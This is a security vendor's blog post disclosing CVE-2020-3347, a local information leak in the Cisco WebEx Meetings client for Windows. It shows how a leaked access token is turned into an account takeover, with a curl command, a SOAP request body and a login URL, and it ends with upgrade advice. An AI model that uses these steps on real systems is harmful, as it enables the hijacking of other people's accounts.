Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Trustwave and Cybereason Merge to Form Global MDR Powerhouse for Unparalleled Cybersecurity Value. Learn More

Services
Managed Detection & Response

Eliminate active threats with 24/7 threat detection, investigation, and response.

Co-Managed SOC (SIEM)

Maximize your SIEM investment, stop alert fatigue, and enhance your team with hybrid security operations support.

Advisory & Diagnostics

Advance your cybersecurity program and get expert guidance where you need it most.

Penetration Testing

Test your physical locations and IT infrastructure to shore up weaknesses before exploitation.

Database Security

Prevent unauthorized access and exceed compliance requirements.

Email Security

Stop email threats others miss and secure your organization against the #1 ransomware attack vector.

Digital Forensics & Incident Response

Prepare for the inevitable with 24/7 global breach response in-region and available on-site.

Firewall & Technology Management

Mitigate risk of a cyberattack with 24/7 incident and health monitoring and the latest threat intelligence.

Solutions
BY TOPIC
Microsoft Security
Unlock the full power of Microsoft Security
Offensive Security
Solutions to maximize your security ROI
Rapidly Secure New Environments
Security for rapid response situations
Securing the Cloud
Safely navigate and stay protected
Securing the IoT Landscape
Test, monitor and secure network objects
Why Trustwave
About Us
Awards and Accolades
Trustwave SpiderLabs Team
Trustwave Fusion Security Operations Platform
Trustwave Security Colony
Partners
Technology Alliance Partners
Key alliances who align and support our ecosystem of security offerings
Trustwave PartnerOne Program
Join forces with Trustwave to protect against the most advance cybersecurity threats

Cisco WebEx Memory for the Taking: CVE-2020-3347

Overview

Due to the global pandemic of COVID-19, there’s been an explosion of video conferencing and messaging software usage to help people transition their work-life to a work from home environment. Vulnerabilities in this type of software now present an even greater risk to its users. Cisco WebEx is one of the most popular video conferencing solutions available, so I decided to turn my research skills to see how secure the platform is. While I did find a relatively severe memory information leakage vulnerability, we worked with Cisco through our responsible disclosure program to get this vulnerability patched.

Cisco WebEx Memory Vulnerability: CVE-2020-3347

The following applies to Cisco Webex Meetings client on Windows, version 40.4.12.8:

AboutCiscoWebExMeetings

Once the application is installed, it adds a tray app that is started once a user logs on and has some dependent processes launched as well at that time. If a user has configured the client to log in automatically (default case), the following applies.

The client has several memory-mapped files (sections in Windows terms) open and some are not protected from opening for reading/writing by any other Windows user. Specifically, there is a section called:

\Sessions\\BaseNamedObjects\WBXTRA_TRACE_FILE_EX

Image002

 

Based on the file name, it appears to hold some trace information. Malicious users can open and dump the contents of this file if they can logon to the machine. Simply put, another user can loop over sessions and try to open, read, and save interesting content for future inspection.

I found that the file always contains the following sensitive information:

  • E-mail account used as a login
  • URL used to host meetings

When a user starts a meeting, the trace file will also contain a WebExAccessToken which allows anyone to impersonate the user and get access to the WebEx account.

A POC program provided in the advisory opens the memory mapped file for reading and dumps its contents to disk. Once the victim starts a meeting, the dump will contain something like this:

Bearer

 

All the attacker needs to do now is to grab the Bearer token from the dump file and use it in the following HTTP POST request:

curl -d @get_token.xml -O https://homeabc.my.webex.com/WBXService/XMLService

Contents of get_token.xml file:

<?xml version="1.0"?>
<serv:message xmlns:serv="http://www.webex.com/schemas/2002/06/service"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<header>
<securityContext>
<webExID>user@host.name</webExID>
<partnerID>PT</partnerID>
<siteName>home-abc.my</siteName>
<clientInfo>CiscoWebexMeetings-Win/40.6.2</clientInfo>
<webExAccessToken>
eyJhbGci...
</webExAccessToken>
</securityContext>
</header>
<body>
<bodyContent xsi:type="java:com.webex.service.binding.user.GetLoginTicket"></bodyContent>
</body>
</serv:message>

In response a one-time login ticket will arrive:

Image004

The next step is to open the following URL in a browser to get control of the victim’s account:

https://home-abc.my.webex.com//home-abc.my/mywebex/tool/frame/mywebexframe.php?MWAT=mw&strUserName=user%40host.name&TK=b30866fa388c26cf5efda0cd6dfee20b8a60163123bddcbfafb46c54700f2448&UTF8=1&SubMenu=PTPMR

 

The token in red comes from the above SOAP request that uses WebAccessToken from the dump.

Voilà:

Image005

 

Using the leaked information, I was able to access my own account from another machine with a different IP address. It allowed me to see all meetings along with invited parties and meeting password (if set), download past meeting recordings, and so on. Here's the entire attack:

 

Summary

In an attack scenario, any malicious local user or malicious process running on a computer where WebEx Client for Windows is installed can monitor the memory mapped file for a login token. Once found the token, like any leaked credentials, can be transmitted somewhere so that it can be used to login to the WebEx account in question, download Recordings, view/edit Meetings, etc.

Users of Cisco WebEx for Windows are recommended to upgrade to version 40.6.0 or the most current version as soon as possible.

Reference

Trustwave Advisory: TWSL2020-003:
Cisco Advisory for CVE-2020-3347: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-webex-client-NBmqM9vt

ABOUT TRUSTWAVE

Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.

Latest Intelligence

Discover how our specialists can tailor a security program to fit the needs of
your organization.

Request a Demo